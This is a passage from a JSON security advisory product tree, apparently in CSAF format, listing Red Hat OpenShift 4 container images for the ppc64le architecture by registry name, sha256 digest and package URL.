"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Af716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3Aa35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3Af09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Aed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3A3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Ac3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ae3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3Adda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Ae689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3A8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3A1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3A23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Aa247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Ab72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Af26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3A13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3Ac029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3A07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3A4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3A645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3A093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3A56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"product_identification_helper": {
